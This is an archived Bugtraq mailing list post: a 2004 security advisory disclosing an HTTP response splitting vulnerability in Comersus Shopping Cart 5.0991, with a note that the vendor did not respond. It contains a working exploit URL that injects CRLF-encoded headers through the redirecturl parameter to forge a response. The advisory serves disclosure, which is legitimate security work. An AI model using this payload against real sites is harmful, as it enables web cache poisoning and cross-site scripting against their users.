Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

ADVISORY: http response splitting hole in Comersus shopping cart
From: "Maestro De-Seguridad" <maestrodeseguridad () lycos com>
Date: Tue, 31 Aug 2004 23:52:54 -0500
ADVISORY
 
Author: Maestro (me!)
 
Date: 01-SEP-04
 
Vendor: Comersus (www.comersus.com)
 
Product: Comersus Shopping Cart 5.0991
 
Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - 

http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
 
Exploit:
http://site/path_to_comersus/comersus_customerLoggedVerify.asp?

redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-L

ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html}

(replace curly braces with lessthan and greaterthan)

Vendor status: vendor was contacted (attempt) several times over the 
last two weeks, by their bug report form, and by emal to support. No 
response so far. 

-- 
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10

  By Date           By Thread  

Current thread:
  • ADVISORY: http response splitting hole in Comersus shopping cart Maestro De-Seguridad (Sep 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]